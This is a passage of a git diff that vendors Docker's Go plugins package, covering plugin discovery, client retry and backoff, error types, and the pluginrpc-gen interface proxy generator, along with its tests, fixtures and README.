+ return nil, &statusError{resp.StatusCode, serviceMethod, string(b)} + } + return resp.Body, nil + } +} + +func backoff(retries int) time.Duration { + b, max := 1, defaultTimeOut + for b < max && retries > 0 { + b *= 2 + retries-- + } + if b > max { + b = max + } + return time.Duration(b) * time.Second +} + +func abort(start time.Time, timeOff time.Duration) bool { + return timeOff+time.Since(start) >= time.Duration(defaultTimeOut)*time.Second +} + +func httpScheme(u *url.URL) string { + scheme := u.Scheme + if scheme != "https" { + scheme = "http" + } + return scheme +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/client_test.go b/vendor/github.com/docker/docker/pkg/plugins/client_test.go new file mode 100644 index 0000000000..9faad86a15 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/client_test.go @@ -0,0 +1,134 @@ +package plugins + +import ( + "io" + "net/http" + "net/http/httptest" + "net/url" + "reflect" + "testing" + "time" + + "github.com/docker/docker/pkg/plugins/transport" + "github.com/docker/go-connections/tlsconfig" +) + +var ( + mux *http.ServeMux + server *httptest.Server +) + +func setupRemotePluginServer() string { + mux = http.NewServeMux() + server = httptest.NewServer(mux) + return server.URL +} + +func teardownRemotePluginServer() { + if server != nil { + server.Close() + } +} + +func TestFailedConnection(t *testing.T) { + c, _ := NewClient("tcp://127.0.0.1:1", &tlsconfig.Options{InsecureSkipVerify: true}) + _, err := c.callWithRetry("Service.Method", nil, false) + if err == nil { + t.Fatal("Unexpected successful connection") + } +} + +func TestEchoInputOutput(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}} + + mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + t.Fatalf("Expected POST, got %s\n", r.Method) + } + + header := w.Header() + header.Set("Content-Type", 
transport.VersionMimetype) + + io.Copy(w, r.Body) + }) + + c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true}) + var output Manifest + err := c.Call("Test.Echo", m, &output) + if err != nil { + t.Fatal(err) + } + + if !reflect.DeepEqual(output, m) { + t.Fatalf("Expected %v, was %v\n", m, output) + } + err = c.Call("Test.Echo", nil, nil) + if err != nil { + t.Fatal(err) + } +} + +func TestBackoff(t *testing.T) { + cases := []struct { + retries int + expTimeOff time.Duration + }{ + {0, time.Duration(1)}, + {1, time.Duration(2)}, + {2, time.Duration(4)}, + {4, time.Duration(16)}, + {6, time.Duration(30)}, + {10, time.Duration(30)}, + } + + for _, c := range cases { + s := c.expTimeOff * time.Second + if d := backoff(c.retries); d != s { + t.Fatalf("Retry %v, expected %v, was %v\n", c.retries, s, d) + } + } +} + +func TestAbortRetry(t *testing.T) { + cases := []struct { + timeOff time.Duration + expAbort bool + }{ + {time.Duration(1), false}, + {time.Duration(2), false}, + {time.Duration(10), false}, + {time.Duration(30), true}, + {time.Duration(40), true}, + } + + for _, c := range cases { + s := c.timeOff * time.Second + if a := abort(time.Now(), s); a != c.expAbort { + t.Fatalf("Duration %v, expected %v, was %v\n", c.timeOff, s, a) + } + } +} + +func TestClientScheme(t *testing.T) { + cases := map[string]string{ + "tcp://127.0.0.1:8080": "http", + "unix:///usr/local/plugins/foo": "http", + "http://127.0.0.1:8080": "http", + "https://127.0.0.1:8080": "https", + } + + for addr, scheme := range cases { + u, err := url.Parse(addr) + if err != nil { + t.Fatal(err) + } + s := httpScheme(u) + + if s != scheme { + t.Fatalf("URL scheme mismatch, expected %s, got %s", scheme, s) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery.go b/vendor/github.com/docker/docker/pkg/plugins/discovery.go new file mode 100644 index 0000000000..e99581c573 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery.go @@ -0,0 +1,131 @@ 
+package plugins + +import ( + "encoding/json" + "errors" + "fmt" + "io/ioutil" + "net/url" + "os" + "path/filepath" + "strings" + "sync" +) + +var ( + // ErrNotFound plugin not found + ErrNotFound = errors.New("plugin not found") + socketsPath = "/run/docker/plugins" +) + +// localRegistry defines a registry that is local (using unix socket). +type localRegistry struct{} + +func newLocalRegistry() localRegistry { + return localRegistry{} +} + +// Scan scans all the plugin paths and returns all the names it found +func Scan() ([]string, error) { + var names []string + if err := filepath.Walk(socketsPath, func(path string, fi os.FileInfo, err error) error { + if err != nil { + return nil + } + + if fi.Mode()&os.ModeSocket != 0 { + name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name())) + names = append(names, name) + } + return nil + }); err != nil { + return nil, err + } + + for _, path := range specsPaths { + if err := filepath.Walk(path, func(p string, fi os.FileInfo, err error) error { + if err != nil || fi.IsDir() { + return nil + } + name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name())) + names = append(names, name) + return nil + }); err != nil { + return nil, err + } + } + return names, nil +} + +// Plugin returns the plugin registered with the given name (or returns an error). +func (l *localRegistry) Plugin(name string) (*Plugin, error) { + socketpaths := pluginPaths(socketsPath, name, ".sock") + + for _, p := range socketpaths { + if fi, err := os.Stat(p); err == nil && fi.Mode()&os.ModeSocket != 0 { + return NewLocalPlugin(name, "unix://"+p), nil + } + } + + var txtspecpaths []string + for _, p := range specsPaths { + txtspecpaths = append(txtspecpaths, pluginPaths(p, name, ".spec")...) + txtspecpaths = append(txtspecpaths, pluginPaths(p, name, ".json")...) 
+ } + + for _, p := range txtspecpaths { + if _, err := os.Stat(p); err == nil { + if strings.HasSuffix(p, ".json") { + return readPluginJSONInfo(name, p) + } + return readPluginInfo(name, p) + } + } + return nil, ErrNotFound +} + +func readPluginInfo(name, path string) (*Plugin, error) { + content, err := ioutil.ReadFile(path) + if err != nil { + return nil, err + } + addr := strings.TrimSpace(string(content)) + + u, err := url.Parse(addr) + if err != nil { + return nil, err + } + + if len(u.Scheme) == 0 { + return nil, fmt.Errorf("Unknown protocol") + } + + return NewLocalPlugin(name, addr), nil +} + +func readPluginJSONInfo(name, path string) (*Plugin, error) { + f, err := os.Open(path) + if err != nil { + return nil, err + } + defer f.Close() + + var p Plugin + if err := json.NewDecoder(f).Decode(&p); err != nil { + return nil, err + } + p.name = name + if p.TLSConfig != nil && len(p.TLSConfig.CAFile) == 0 { + p.TLSConfig.InsecureSkipVerify = true + } + p.activateWait = sync.NewCond(&sync.Mutex{}) + + return &p, nil +} + +func pluginPaths(base, name, ext string) []string { + return []string{ + filepath.Join(base, name+ext), + filepath.Join(base, name, name+ext), + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go new file mode 100644 index 0000000000..03f9d00319 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go @@ -0,0 +1,152 @@ +package plugins + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func Setup(t *testing.T) (string, func()) { + tmpdir, err := ioutil.TempDir("", "docker-test") + if err != nil { + t.Fatal(err) + } + backup := socketsPath + socketsPath = tmpdir + specsPaths = []string{tmpdir} + + return tmpdir, func() { + socketsPath = backup + os.RemoveAll(tmpdir) + } +} + +func TestFileSpecPlugin(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + cases := []struct { + path string + 
name string + addr string + fail bool + }{ + // TODO Windows: Factor out the unix:// variants. + {filepath.Join(tmpdir, "echo.spec"), "echo", "unix://var/lib/docker/plugins/echo.sock", false}, + {filepath.Join(tmpdir, "echo", "echo.spec"), "echo", "unix://var/lib/docker/plugins/echo.sock", false}, + {filepath.Join(tmpdir, "foo.spec"), "foo", "tcp://localhost:8080", false}, + {filepath.Join(tmpdir, "foo", "foo.spec"), "foo", "tcp://localhost:8080", false}, + {filepath.Join(tmpdir, "bar.spec"), "bar", "localhost:8080", true}, // unknown transport + } + + for _, c := range cases { + if err := os.MkdirAll(filepath.Dir(c.path), 0755); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(c.path, []byte(c.addr), 0644); err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + p, err := r.Plugin(c.name) + if c.fail && err == nil { + continue + } + + if err != nil { + t.Fatal(err) + } + + if p.name != c.name { + t.Fatalf("Expected plugin `%s`, got %s\n", c.name, p.name) + } + + if p.Addr != c.addr { + t.Fatalf("Expected plugin addr `%s`, got %s\n", c.addr, p.Addr) + } + + if p.TLSConfig.InsecureSkipVerify != true { + t.Fatalf("Expected TLS verification to be skipped") + } + } +} + +func TestFileJSONSpecPlugin(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + p := filepath.Join(tmpdir, "example.json") + spec := `{ + "Name": "plugin-example", + "Addr": "https://example.com/docker/plugin", + "TLSConfig": { + "CAFile": "/usr/shared/docker/certs/example-ca.pem", + "CertFile": "/usr/shared/docker/certs/example-cert.pem", + "KeyFile": "/usr/shared/docker/certs/example-key.pem" + } +}` + + if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + plugin, err := r.Plugin("example") + if err != nil { + t.Fatal(err) + } + + if expected, actual := "example", plugin.name; expected != actual { + t.Fatalf("Expected plugin %q, got %s\n", expected, actual) + } + + if plugin.Addr != 
"https://example.com/docker/plugin" { + t.Fatalf("Expected plugin addr `https://example.com/docker/plugin`, got %s\n", plugin.Addr) + } + + if plugin.TLSConfig.CAFile != "/usr/shared/docker/certs/example-ca.pem" { + t.Fatalf("Expected plugin CA `/usr/shared/docker/certs/example-ca.pem`, got %s\n", plugin.TLSConfig.CAFile) + } + + if plugin.TLSConfig.CertFile != "/usr/shared/docker/certs/example-cert.pem" { + t.Fatalf("Expected plugin Certificate `/usr/shared/docker/certs/example-cert.pem`, got %s\n", plugin.TLSConfig.CertFile) + } + + if plugin.TLSConfig.KeyFile != "/usr/shared/docker/certs/example-key.pem" { + t.Fatalf("Expected plugin Key `/usr/shared/docker/certs/example-key.pem`, got %s\n", plugin.TLSConfig.KeyFile) + } +} + +func TestFileJSONSpecPluginWithoutTLSConfig(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + p := filepath.Join(tmpdir, "example.json") + spec := `{ + "Name": "plugin-example", + "Addr": "https://example.com/docker/plugin" +}` + + if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + plugin, err := r.Plugin("example") + if err != nil { + t.Fatal(err) + } + + if expected, actual := "example", plugin.name; expected != actual { + t.Fatalf("Expected plugin %q, got %s\n", expected, actual) + } + + if plugin.Addr != "https://example.com/docker/plugin" { + t.Fatalf("Expected plugin addr `https://example.com/docker/plugin`, got %s\n", plugin.Addr) + } + + if plugin.TLSConfig != nil { + t.Fatalf("Expected plugin TLSConfig nil, got %v\n", plugin.TLSConfig) + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go new file mode 100644 index 0000000000..693a47e394 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go @@ -0,0 +1,5 @@ +// +build !windows + +package plugins + +var specsPaths = []string{"/etc/docker/plugins", "/usr/lib/docker/plugins"} diff 
--git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go new file mode 100644 index 0000000000..3e2d506b97 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go @@ -0,0 +1,61 @@ +// +build !windows + +package plugins + +import ( + "fmt" + "net" + "os" + "path/filepath" + "reflect" + "testing" +) + +func TestLocalSocket(t *testing.T) { + // TODO Windows: Enable a similar version for Windows named pipes + tmpdir, unregister := Setup(t) + defer unregister() + + cases := []string{ + filepath.Join(tmpdir, "echo.sock"), + filepath.Join(tmpdir, "echo", "echo.sock"), + } + + for _, c := range cases { + if err := os.MkdirAll(filepath.Dir(c), 0755); err != nil { + t.Fatal(err) + } + + l, err := net.Listen("unix", c) + if err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + p, err := r.Plugin("echo") + if err != nil { + t.Fatal(err) + } + + pp, err := r.Plugin("echo") + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(p, pp) { + t.Fatalf("Expected %v, was %v\n", p, pp) + } + + if p.name != "echo" { + t.Fatalf("Expected plugin `echo`, got %s\n", p.name) + } + + addr := fmt.Sprintf("unix://%s", c) + if p.Addr != addr { + t.Fatalf("Expected plugin addr `%s`, got %s\n", addr, p.Addr) + } + if p.TLSConfig.InsecureSkipVerify != true { + t.Fatalf("Expected TLS verification to be skipped") + } + l.Close() + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go new file mode 100644 index 0000000000..d7c1fe4942 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go @@ -0,0 +1,8 @@ +package plugins + +import ( + "os" + "path/filepath" +) + +var specsPaths = []string{filepath.Join(os.Getenv("programdata"), "docker", "plugins")} diff --git a/vendor/github.com/docker/docker/pkg/plugins/errors.go 
b/vendor/github.com/docker/docker/pkg/plugins/errors.go new file mode 100644 index 0000000000..7988471026 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/errors.go @@ -0,0 +1,33 @@ +package plugins + +import ( + "fmt" + "net/http" +) + +type statusError struct { + status int + method string + err string +} + +// Error returns a formatted string for this error type +func (e *statusError) Error() string { + return fmt.Sprintf("%s: %v", e.method, e.err) +} + +// IsNotFound indicates if the passed in error is from an http.StatusNotFound from the plugin +func IsNotFound(err error) bool { + return isStatusError(err, http.StatusNotFound) +} + +func isStatusError(err error, status int) bool { + if err == nil { + return false + } + e, ok := err.(*statusError) + if !ok { + return false + } + return e.status == status +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go new file mode 100644 index 0000000000..b19c0d52f1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go @@ -0,0 +1,44 @@ +package plugins + +import ( + "errors" + "path/filepath" + "runtime" + "sync" + "testing" + "time" +) + +// regression test for deadlock in handlers +func TestPluginAddHandler(t *testing.T) { + // make a plugin which is pre-activated + p := &Plugin{activateWait: sync.NewCond(&sync.Mutex{})} + p.Manifest = &Manifest{Implements: []string{"bananas"}} + storage.plugins["qwerty"] = p + + testActive(t, p) + Handle("bananas", func(_ string, _ *Client) {}) + testActive(t, p) +} + +func TestPluginWaitBadPlugin(t *testing.T) { + p := &Plugin{activateWait: sync.NewCond(&sync.Mutex{})} + p.activateErr = errors.New("some junk happened") + testActive(t, p) +} + +func testActive(t *testing.T, p *Plugin) { + done := make(chan struct{}) + go func() { + p.waitActive() + close(done) + }() + + select { + case <-time.After(100 * time.Millisecond): + _, f, l, _ := runtime.Caller(1) + 
t.Fatalf("%s:%d: deadlock in waitActive", filepath.Base(f), l) + case <-done: + } + +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md new file mode 100644 index 0000000000..0418a3e00a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md @@ -0,0 +1,58 @@ +Plugin RPC Generator +==================== + +Generates go code from a Go interface definition for proxying between the plugin +API and the subsystem being extended. + +## Usage + +Given an interface definition: + +```go +type volumeDriver interface { + Create(name string, opts opts) (err error) + Remove(name string) (err error) + Path(name string) (mountpoint string, err error) + Mount(name string) (mountpoint string, err error) + Unmount(name string) (err error) +} +``` + +**Note**: All function options and return values must be named in the definition. + +Run the generator: + +```bash +$ pluginrpc-gen --type volumeDriver --name VolumeDriver -i volumes/drivers/extpoint.go -o volumes/drivers/proxy.go +``` + +Where: +- `--type` is the name of the interface to use +- `--name` is the subsystem that the plugin "Implements" +- `-i` is the input file containing the interface definition +- `-o` is the output file where the the generated code should go + +**Note**: The generated code will use the same package name as the one defined in the input file + +Optionally, you can skip functions on the interface that should not be +implemented in the generated proxy code by passing in the function name to `--skip`. +This flag can be specified multiple times. + +You can also add build tags that should be prepended to the generated code by +supplying `--tag`. This flag can be specified multiple times. + +## Known issues + +## go-generate + +You can also use this with go-generate, which is pretty awesome. 
+To do so, place the code at the top of the file which contains the interface +definition (i.e., the input file): + +```go +//go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver +``` + +Then cd to the package dir and run `go generate` + +**Note**: the `pluginrpc-gen` binary must be within your `$PATH` diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go new file mode 100644 index 0000000000..5695dcc2d4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go @@ -0,0 +1,89 @@ +package foo + +import ( + "fmt" + + aliasedio "io" + + "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture" +) + +var ( + errFakeImport = fmt.Errorf("just to import fmt for imports tests") +) + +type wobble struct { + Some string + Val string + Inception *wobble +} + +// Fooer is an empty interface used for tests. +type Fooer interface{} + +// Fooer2 is an interface used for tests. +type Fooer2 interface { + Foo() +} + +// Fooer3 is an interface used for tests. +type Fooer3 interface { + Foo() + Bar(a string) + Baz(a string) (err error) + Qux(a, b string) (val string, err error) + Wobble() (w *wobble) + Wiggle() (w wobble) + WiggleWobble(a []*wobble, b []wobble, c map[string]*wobble, d map[*wobble]wobble, e map[string][]wobble, f []*otherfixture.Spaceship) (g map[*wobble]wobble, h [][]*wobble, i otherfixture.Spaceship, j *otherfixture.Spaceship, k map[*otherfixture.Spaceship]otherfixture.Spaceship, l []otherfixture.Spaceship) +} + +// Fooer4 is an interface used for tests. +type Fooer4 interface { + Foo() error +} + +// Bar is an interface used for tests. +type Bar interface { + Boo(a string, b string) (s string, err error) +} + +// Fooer5 is an interface used for tests. +type Fooer5 interface { + Foo() + Bar +} + +// Fooer6 is an interface used for tests. 
+type Fooer6 interface { + Foo(a otherfixture.Spaceship) +} + +// Fooer7 is an interface used for tests. +type Fooer7 interface { + Foo(a *otherfixture.Spaceship) +} + +// Fooer8 is an interface used for tests. +type Fooer8 interface { + Foo(a map[string]otherfixture.Spaceship) +} + +// Fooer9 is an interface used for tests. +type Fooer9 interface { + Foo(a map[string]*otherfixture.Spaceship) +} + +// Fooer10 is an interface used for tests. +type Fooer10 interface { + Foo(a []otherfixture.Spaceship) +} + +// Fooer11 is an interface used for tests. +type Fooer11 interface { + Foo(a []*otherfixture.Spaceship) +} + +// Fooer12 is an interface used for tests. +type Fooer12 interface { + Foo(a aliasedio.Reader) +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go new file mode 100644 index 0000000000..1937d1786c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go @@ -0,0 +1,4 @@ +package otherfixture + +// Spaceship is a fixture for tests +type Spaceship struct{} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go new file mode 100644 index 0000000000..e77a7d45ff --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go @@ -0,0 +1,91 @@ +package main + +import ( + "bytes" + "flag" + "fmt" + "go/format" + "io/ioutil" + "os" + "unicode" + "unicode/utf8" +) + +type stringSet struct { + values map[string]struct{} +} + +func (s stringSet) String() string { + return "" +} + +func (s stringSet) Set(value string) error { + s.values[value] = struct{}{} + return nil +} +func (s stringSet) GetValues() map[string]struct{} { + return s.values +} + +var ( + typeName = flag.String("type", "", "interface type to generate plugin rpc proxy for") + rpcName = 
flag.String("name", *typeName, "RPC name, set if different from type") + inputFile = flag.String("i", "", "input file path") + outputFile = flag.String("o", *inputFile+"_proxy.go", "output file path") + + skipFuncs map[string]struct{} + flSkipFuncs = stringSet{make(map[string]struct{})} + + flBuildTags = stringSet{make(map[string]struct{})} +) + +func errorOut(msg string, err error) { + if err == nil { + return + } + fmt.Fprintf(os.Stderr, "%s: %v\n", msg, err) + os.Exit(1) +} + +func checkFlags() error { + if *outputFile == "" { + return fmt.Errorf("missing required flag `-o`") + } + if *inputFile == "" { + return fmt.Errorf("missing required flag `-i`") + } + return nil +} + +func main() { + flag.Var(flSkipFuncs, "skip", "skip parsing for function") + flag.Var(flBuildTags, "tag", "build tags to add to generated files") + flag.Parse() + skipFuncs = flSkipFuncs.GetValues() + + errorOut("error", checkFlags()) + + pkg, err := Parse(*inputFile, *typeName) + errorOut(fmt.Sprintf("error parsing requested type %s", *typeName), err) + + var analysis = struct { + InterfaceType string + RPCName string + BuildTags map[string]struct{} + *ParsedPkg + }{toLower(*typeName), *rpcName, flBuildTags.GetValues(), pkg} + var buf bytes.Buffer + + errorOut("parser error", generatedTempl.Execute(&buf, analysis)) + src, err := format.Source(buf.Bytes()) + errorOut("error formatting generated source:\n"+buf.String(), err) + errorOut("error writing file", ioutil.WriteFile(*outputFile, src, 0644)) +} + +func toLower(s string) string { + if s == "" { + return "" + } + r, n := utf8.DecodeRuneInString(s) + return string(unicode.ToLower(r)) + s[n:] +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go new file mode 100644 index 0000000000..6c547e18cf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go @@ -0,0 +1,263 @@ +package main + +import ( + "errors" + 
"fmt" + "go/ast" + "go/parser" + "go/token" + "path" + "reflect" + "strings" +) + +var errBadReturn = errors.New("found return arg with no name: all args must be named") + +type errUnexpectedType struct { + expected string + actual interface{} +} + +func (e errUnexpectedType) Error() string { + return fmt.Sprintf("got wrong type expecting %s, got: %v", e.expected, reflect.TypeOf(e.actual)) +} + +// ParsedPkg holds information about a package that has been parsed, +// its name and the list of functions. +type ParsedPkg struct { + Name string + Functions []function + Imports []importSpec +} + +type function struct { + Name string + Args []arg + Returns []arg + Doc string +} + +type arg struct { + Name string + ArgType string + PackageSelector string +} + +func (a *arg) String() string { + return a.Name + " " + a.ArgType +} + +type importSpec struct { + Name string + Path string +} + +func (s *importSpec) String() string { + var ss string + if len(s.Name) != 0 { + ss += s.Name + } + ss += s.Path + return ss +} + +// Parse parses the given file for an interface definition with the given name. 
+func Parse(filePath string, objName string) (*ParsedPkg, error) { + fs := token.NewFileSet() + pkg, err := parser.ParseFile(fs, filePath, nil, parser.AllErrors) + if err != nil { + return nil, err + } + p := &ParsedPkg{} + p.Name = pkg.Name.Name + obj, exists := pkg.Scope.Objects[objName] + if !exists { + return nil, fmt.Errorf("could not find object %s in %s", objName, filePath) + } + if obj.Kind != ast.Typ { + return nil, fmt.Errorf("exected type, got %s", obj.Kind) + } + spec, ok := obj.Decl.(*ast.TypeSpec) + if !ok { + return nil, errUnexpectedType{"*ast.TypeSpec", obj.Decl} + } + iface, ok := spec.Type.(*ast.InterfaceType) + if !ok { + return nil, errUnexpectedType{"*ast.InterfaceType", spec.Type} + } + + p.Functions, err = parseInterface(iface) + if err != nil { + return nil, err + } + + // figure out what imports will be needed + imports := make(map[string]importSpec) + for _, f := range p.Functions { + args := append(f.Args, f.Returns...) + for _, arg := range args { + if len(arg.PackageSelector) == 0 { + continue + } + + for _, i := range pkg.Imports { + if i.Name != nil { + if i.Name.Name != arg.PackageSelector { + continue + } + imports[i.Path.Value] = importSpec{Name: arg.PackageSelector, Path: i.Path.Value} + break + } + + _, name := path.Split(i.Path.Value) + splitName := strings.Split(name, "-") + if len(splitName) > 1 { + name = splitName[len(splitName)-1] + } + // import paths have quotes already added in, so need to remove them for name comparison + name = strings.TrimPrefix(name, `"`) + name = strings.TrimSuffix(name, `"`) + if name == arg.PackageSelector { + imports[i.Path.Value] = importSpec{Path: i.Path.Value} + break + } + } + } + } + + for _, spec := range imports { + p.Imports = append(p.Imports, spec) + } + + return p, nil +} + +func parseInterface(iface *ast.InterfaceType) ([]function, error) { + var functions []function + for _, field := range iface.Methods.List { + switch f := field.Type.(type) { + case *ast.FuncType: + method, err := 
parseFunc(field) + if err != nil { + return nil, err + } + if method == nil { + continue + } + functions = append(functions, *method) + case *ast.Ident: + spec, ok := f.Obj.Decl.(*ast.TypeSpec) + if !ok { + return nil, errUnexpectedType{"*ast.TypeSpec", f.Obj.Decl} + } + iface, ok := spec.Type.(*ast.InterfaceType) + if !ok { + return nil, errUnexpectedType{"*ast.TypeSpec", spec.Type} + } + funcs, err := parseInterface(iface) + if err != nil { + fmt.Println(err) + continue + } + functions = append(functions, funcs...) + default: + return nil, errUnexpectedType{"*astFuncType or *ast.Ident", f} + } + } + return functions, nil +} + +func parseFunc(field *ast.Field) (*function, error) { + f := field.Type.(*ast.FuncType) + method := &function{Name: field.Names[0].Name} + if _, exists := skipFuncs[method.Name]; exists { + fmt.Println("skipping:", method.Name) + return nil, nil + } + if f.Params != nil { + args, err := parseArgs(f.Params.List) + if err != nil { + return nil, err + } + method.Args = args + } + if f.Results != nil { + returns, err := parseArgs(f.Results.List) + if err != nil { + return nil, fmt.Errorf("error parsing function returns for %q: %v", method.Name, err) + } + method.Returns = returns + } + return method, nil +} + +func parseArgs(fields []*ast.Field) ([]arg, error) { + var args []arg + for _, f := range fields { + if len(f.Names) == 0 { + return nil, errBadReturn + } + for _, name := range f.Names { + p, err := parseExpr(f.Type) + if err != nil { + return nil, err + } + args = append(args, arg{name.Name, p.value, p.pkg}) + } + } + return args, nil +} + +type parsedExpr struct { + value string + pkg string +} + +func parseExpr(e ast.Expr) (parsedExpr, error) { + var parsed parsedExpr + switch i := e.(type) { + case *ast.Ident: + parsed.value += i.Name + case *ast.StarExpr: + p, err := parseExpr(i.X) + if err != nil { + return parsed, err + } + parsed.value += "*" + parsed.value += p.value + parsed.pkg = p.pkg + case *ast.SelectorExpr: + p, err := 
parseExpr(i.X) + if err != nil { + return parsed, err + } + parsed.pkg = p.value + parsed.value += p.value + "." + parsed.value += i.Sel.Name + case *ast.MapType: + parsed.value += "map[" + p, err := parseExpr(i.Key) + if err != nil { + return parsed, err + } + parsed.value += p.value + parsed.value += "]" + p, err = parseExpr(i.Value) + if err != nil { + return parsed, err + } + parsed.value += p.value + parsed.pkg = p.pkg + case *ast.ArrayType: + parsed.value += "[]" + p, err := parseExpr(i.Elt) + if err != nil { + return parsed, err + } + parsed.value += p.value + parsed.pkg = p.pkg + default: + return parsed, errUnexpectedType{"*ast.Ident or *ast.StarExpr", i} + } + return parsed, nil +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go new file mode 100644 index 0000000000..a1b1ac9567 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go @@ -0,0 +1,222 @@ +package main + +import ( + "fmt" + "path/filepath" + "runtime" + "strings" + "testing" +) + +const testFixture = "fixtures/foo.go" + +func TestParseEmptyInterface(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer") + if err != nil { + t.Fatal(err) + } + + assertName(t, "foo", pkg.Name) + assertNum(t, 0, len(pkg.Functions)) +} + +func TestParseNonInterfaceType(t *testing.T) { + _, err := Parse(testFixture, "wobble") + if _, ok := err.(errUnexpectedType); !ok { + t.Fatal("expected type error when parsing non-interface type") + } +} + +func TestParseWithOneFunction(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer2") + if err != nil { + t.Fatal(err) + } + + assertName(t, "foo", pkg.Name) + assertNum(t, 1, len(pkg.Functions)) + assertName(t, "Foo", pkg.Functions[0].Name) + assertNum(t, 0, len(pkg.Functions[0].Args)) + assertNum(t, 0, len(pkg.Functions[0].Returns)) +} + +func TestParseWithMultipleFuncs(t *testing.T) { + pkg, err := Parse(testFixture, 
"Fooer3") + if err != nil { + t.Fatal(err) + } + + assertName(t, "foo", pkg.Name) + assertNum(t, 7, len(pkg.Functions)) + + f := pkg.Functions[0] + assertName(t, "Foo", f.Name) + assertNum(t, 0, len(f.Args)) + assertNum(t, 0, len(f.Returns)) + + f = pkg.Functions[1] + assertName(t, "Bar", f.Name) + assertNum(t, 1, len(f.Args)) + assertNum(t, 0, len(f.Returns)) + arg := f.Args[0] + assertName(t, "a", arg.Name) + assertName(t, "string", arg.ArgType) + + f = pkg.Functions[2] + assertName(t, "Baz", f.Name) + assertNum(t, 1, len(f.Args)) + assertNum(t, 1, len(f.Returns)) + arg = f.Args[0] + assertName(t, "a", arg.Name) + assertName(t, "string", arg.ArgType) + arg = f.Returns[0] + assertName(t, "err", arg.Name) + assertName(t, "error", arg.ArgType) + + f = pkg.Functions[3] + assertName(t, "Qux", f.Name) + assertNum(t, 2, len(f.Args)) + assertNum(t, 2, len(f.Returns)) + arg = f.Args[0] + assertName(t, "a", f.Args[0].Name) + assertName(t, "string", f.Args[0].ArgType) + arg = f.Args[1] + assertName(t, "b", arg.Name) + assertName(t, "string", arg.ArgType) + arg = f.Returns[0] + assertName(t, "val", arg.Name) + assertName(t, "string", arg.ArgType) + arg = f.Returns[1] + assertName(t, "err", arg.Name) + assertName(t, "error", arg.ArgType) + + f = pkg.Functions[4] + assertName(t, "Wobble", f.Name) + assertNum(t, 0, len(f.Args)) + assertNum(t, 1, len(f.Returns)) + arg = f.Returns[0] + assertName(t, "w", arg.Name) + assertName(t, "*wobble", arg.ArgType) + + f = pkg.Functions[5] + 